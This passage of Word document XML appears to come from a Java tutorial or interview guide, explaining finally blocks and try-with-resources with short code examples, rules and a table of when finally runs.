          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cleanup code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11700FF6" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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osing file streams or database connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321026C" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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leasing resources (e.g., sockets, threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466A998" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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gging or final statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21852D8C" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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5F7634A">
          <v:rect id="_x0000_i1639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D311B1F" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA1DC6"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y {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43850088"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risky code that may throw exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607245CF"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catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AECFF54"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handle exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110BE6ED"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A6C86D"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leanup code — always runs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6963A528"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EC3EC23" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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1EA8CF39">
          <v:rect id="_x0000_i1640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46D72E" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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11B9B8BC"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FinallyExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF0C08B"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5B174978"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A6A8B"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result = 10 / 0;  // throws ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38862A31"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tch (ArithmeticException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0D6F86"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aught exception: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C135D"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FFACA8"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This is the finally block — always executed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F62A6"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CC86E4B"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03C13FA"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BD74AC4" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C1F3E"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aught exception: / by zero  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72273F6C"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is the finally block — always executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B91163" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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D22802B">
          <v:rect id="_x0000_i1641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCE63E" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979CC37" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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finally block </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>executes even if the exception is not caught</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C1ED8" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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also runs </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if you return from the method inside try or catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057F52D" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>won’t run</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only if the JVM shuts down (e.g., System.exit(0) or crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6965755E" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AE234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F9BCFE2">
          <v:rect id="_x0000_i1642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="745495ED" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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68"/>
        <w:gridCol w:w="1775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="6A996C73" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C088BD2" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EE8F8B1" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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Runs finally block?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="0433D4AD" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AE262ED"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exception thrown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79F9EE31"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="607BEBAA" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5372A286"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ception thrown &amp; caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD1D8ED"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="37452DFB" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0CC46F"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ception thrown &amp; not caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DD88A7A"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="5155DC75" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7401D0D8"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 in try/catch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B5E66F"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE234D" w:rsidRPr="00CE4B95" w14:paraId="219322BC" w14:textId="77777777" w:rsidTr="007C0DE5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65F74DD1"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exit(0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B71388B" w14:textId="77777777" w:rsidR="007C0DE5" w:rsidRPr="00CE4B95" w:rsidRDefault="007C0DE5" w:rsidP="00AE234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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08B6904A" w14:textId="723ABA1F" w:rsidR="00595923" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="40CC21D5">
          <v:rect id="_x0000_i1643" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBF25A" w14:textId="77777777" w:rsidR="00890773" w:rsidRPr="00CE4B95" w:rsidRDefault="00890773">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc196307688"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a try with resources?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="7EF5F039" w14:textId="1AD5BB3D" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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wesome! Let’s talk about </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try-with-resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — one of the coolest features introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic resource management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DA614" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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B6947E6">
          <v:rect id="_x0000_i1644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A93257" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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at is try-with-resources?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD3514"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s a special form of the try block used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically close resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like files, streams, DB connections) when the try block finishes — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no need for finally block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manually close them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEA3BAD" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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0F82AEE">
          <v:rect id="_x0000_i1645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800158B" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26474A18"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y (ResourceType resource = new ResourceType()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F230F8"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se the resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D610D"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catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50910A16"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Handle exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673CCA14"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221442C" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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B93C75A">
          <v:rect id="_x0000_i1646" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71411CD4" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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ules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBF0D7" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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resource must implement the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AutoCloseable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface (or Closeable which extends it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015363D1" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93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Resources are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically closed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the end of the try block — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no need for finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728F821" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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F5387D6">
          <v:rect id="_x0000_i1647" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3F476" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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File Reading (Before Java 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D863C97"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ufferedReader br = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF5215"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y {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198CD8C2"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br = new BufferedReader(new FileReader("file.txt"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6437E2"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br.readLine());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0B5C9"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catch (IOException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220AD44F"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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147FB0F2"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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B3EA04"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E255479"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br != null) br.close(); // manually closing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29268891"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tch (IOException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651EEBA"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x.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50403D6C"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B8128A2"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500A4DF" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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8EE2CE">
          <v:rect id="_x0000_i1648" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1C691" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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ith Try-With-Resources (Java 7+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB946C"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y (BufferedReader br = new BufferedReader(new FileReader("file.txt"))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9D4DF"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br.readLine());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58161F"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catch (IOException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74559C6B"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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EAA10"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1AEDE96"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 xml:space="preserve">Cleaner, less error-prone, and auto-closed! </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9DF1DE" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C7A5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E9FA5F1">
          <v:rect id="_x0000_i1649" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72548F29" w14:textId="77777777" w:rsidR="00BC2ECB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC2ECB" w:rsidP="009C7A57">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Multiple Resources Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31051CF8"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y (</w:t>
      </w:r>
    </w:p>
